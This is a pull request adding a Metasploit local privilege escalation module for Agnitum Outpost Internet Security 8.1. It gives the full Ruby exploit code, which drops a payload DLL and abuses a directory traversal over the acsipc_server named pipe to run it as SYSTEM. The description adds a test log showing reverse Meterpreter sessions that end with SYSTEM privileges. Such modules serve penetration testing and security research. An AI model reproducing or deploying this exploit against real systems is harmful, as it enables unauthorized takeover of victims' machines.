### PR TITLE
Add module for OSVDB 96208

### DIFF
--- a/modules/exploits/windows/local/agnitum_outpost_acs.rb
+++ b/modules/exploits/windows/local/agnitum_outpost_acs.rb
@@ -1,0 +1,179 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/process'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'           => 'Agnitum Outpost Internet Security Local Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability on Agnitum Outpost Internet
+        Security 8.1. The vulnerability exists on the acs.exe component, allowing the user to load
+        load arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary
+        code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with
+        Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Ahmad Moghimi', # Vulnerability discovery
+          'juan vazquez' # MSF module
+        ],
+      'Arch'           => ARCH_X86,
+      'Platform'       => 'win',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Privileged'     => true,
+      'Targets'        =>
+        [
+          [ 'Agnitum Outpost Internet Security 8.1', { } ],
+        ],
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'References'     =>
+        [
+          [ 'OSVDB', '96208' ],
+          [ 'EDB', '27282' ],
+          [ 'URL', 'http://mallocat.com/a-journey-to-antivirus-escalation/' ]
+        ],
+      'DisclosureDate' => 'Aug 02 2013',
+      'DefaultTarget'  => 0
+    }))
+
+    register_options([
+      # It is OptPath becuase it's a *remote* path
+      OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ]),
+      # By default acs.exe lives on C:\Program Files\Agnitum\Outpost Security Suite Pro\
+      OptInt.new("DEPTH", [ true, "Traversal depth", 3 ])
+    ], self.class)
+
+
+  end
+
+  def junk(n=4)
+    return rand_text_alpha(n).unpack("V").first
+  end
+
+  def open_named_pipe(pipe)
+    invalid_handle_value = 0xFFFFFFFF
+
+    r = session.railgun.kernel32.CreateFileA(pipe, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL", 0)
+
+    handle = r['return']
+
+    if handle == invalid_handle_value
+      return nil
+    end
+
+    return handle
+  end
+
+  def write_named_pipe(handle, dll_path, dll_name)
+
+    traversal_path = "..\\" * datastore["DEPTH"]
+    traversal_path << dll_path.gsub(/^[a-zA-Z]+:\\/, "")
+    traversal_path << "\\#{dll_name}"
+
+    path = Rex::Text.to_unicode(traversal_path)
+
+    data = "\x00" * 0x11
+    data << path
+    data << "\x00\x00"
+    data << "\x00\x00\x00"
+
+    buf = [0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15].pack("V*") # GUID common_handler
+    buf << [0x17].pack("V") # command
+    buf << [junk].pack("V")
+    buf << [data.length].pack("V")
+    buf << [0, 0, 0].pack("V*")
+    buf << data
+
+    w = client.railgun.kernel32.WriteFile(handle, buf, buf.length, 4, nil)
+
+    if w['return'] == false
+      print_error("The was an error writing to disk, check permissions")
+      return nil
+    end
+
+    return w['lpNumberOfBytesWritten']
+  end
+
+
+  def check
+    handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")
+    if handle.nil?
+      return Exploit::CheckCode::Safe
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+    return Exploit::CheckCode::Detected
+  end
+
+  def exploit
+
+    temp_dir = ""
+
+    print_status("Opening named pipe...")
+    handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")
+    if handle.nil?
+      fail_with(Failure::NoTarget, "\\\\.\\pipe\\acsipc_server named pipe not found")
+    else
+      print_good("\\\\.\\pipe\\acsipc_server found! Proceeding...")
+    end
+
+    if datastore["WritableDir"] and not datastore["WritableDir"].empty?
+      temp_dir = datastore["WritableDir"]
+    else
+      temp_dir = expand_path("%TEMP%")
+    end
+
+    print_status("Using #{temp_dir} to drop malicious DLL...")
+    begin
+      cd(temp_dir)
+    rescue Rex::Post::Meterpreter::RequestError
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Config, "Failed to use the #{temp_dir} directory")
+    end
+
+    print_status("Writing malicious DLL to remote filesystem")
+    write_path = pwd
+    dll_name = "#{rand_text_alpha(10 + rand(10))}.dll"
+    begin
+      # Agnitum Outpost Internet Security doesn't complain when dropping the dll to filesystem
+      write_file(dll_name, generate_payload_dll)
+      register_file_for_cleanup("#{write_path}\\#{dll_name}")
+    rescue Rex::Post::Meterpreter::RequestError
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Config, "Failed to drop payload into #{temp_dir}")
+    end
+
+    print_status("Exploiting through \\\\.\\pipe\\acsipc_server...")
+    bytes = write_named_pipe(handle, write_path, dll_name)
+    session.railgun.kernel32.CloseHandle(handle)
+
+    if bytes.nil?
+      fail_with(Failure::Unknown, "Failed while writing to \\\\.\\pipe\\acsipc_server")
+    end
+
+  end
+
+end

--- a/modules/exploits/windows/local/agnitum_outpost_acs.rb
+++ b/modules/exploits/windows/local/agnitum_outpost_acs.rb
@@ -70,8 +70,8 @@ class Metasploit3 < Msf::Exploit::Local
 
   end
 
-  def junk(n=4)
-    return rand_text_alpha(n).unpack("V").first
+  def junk
+    return rand_text_alpha(4).unpack("V").first
   end
 
   def open_named_pipe(pipe)


### PR DESCRIPTION
Tested with Agnitum Outpost Internet Security 8.1 on Windows 7 SP1 (32 bits and 64 bits (executing payload with WOW))

Test:

```
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.172.239
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.239:49189) at 2013-09-11 00:06:32 -0500

meterpreter > sysinfo
Computer        : WIN-E8OO67TALQA
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: WIN-E8OO67TALQA\juan
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/agnitum_outpost_acs 
msf exploit(agnitum_outpost_acs) > set session 1
session => 1
msf exploit(agnitum_outpost_acs) > check
[*] The target service is running, but could not be validated.
msf exploit(agnitum_outpost_acs) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.0.3:4444 
[*] Opening named pipe...
[+] \\.\pipe\acsipc_server found! Proceeding...
[*] Using C:\Users\juan\AppData\Local\Temp to drop malicious DLL...
[*] Writing malicious DLL to remote filesystem
[*] Exploiting through \\.\pipe\acsipc_server...
[*] Sending stage (752128 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:51522) at 2013-09-11 00:06:57 -0500
[+] Deleted C:\Users\juan\AppData\Local\Temp\xlulGZzMladzqRyfyt.dll

meterpreter > sysinfo
Computer        : WIN-E8OO67TALQA
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit

```
